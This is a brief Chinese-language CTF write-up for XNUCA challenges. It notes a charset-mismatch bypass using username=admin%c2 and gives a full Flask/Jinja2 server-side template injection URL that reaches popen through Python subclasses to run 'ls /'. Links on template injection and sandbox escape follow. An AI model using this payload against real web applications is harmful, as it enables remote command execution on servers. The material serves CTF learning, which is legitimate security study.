XNUCA

#Md5

构造username=admin%c2使用get传参
题目中提到了客户端为utf8且数据库为latin1
*get传参的基本姿势 XXX.php？xxxx=xxxxx

#Flask

Python模板注入
http://711a4f6c6d186da9ab08ce8b281515b3.xnuca.cn/{{ [].__class__.__base__.__subclasses__()[59].__init__.func_globals['linecache'].__dict__.values()[12].__dict__.values()[115]('ls /').read() }}

相当于调用popen函数，可执行系统命令。
以上为大佬的WP

#相关链接：

任意文件读取POC（模板注入）http://www.cnblogs.com/tyomcat/p/5440488.html
模板注入 https://nvisium.com/blog/2015/12/07/injecting-flask/
沙盒逃逸 https://hexplo.it/escaping-the-csawctf-python-sandbox/ python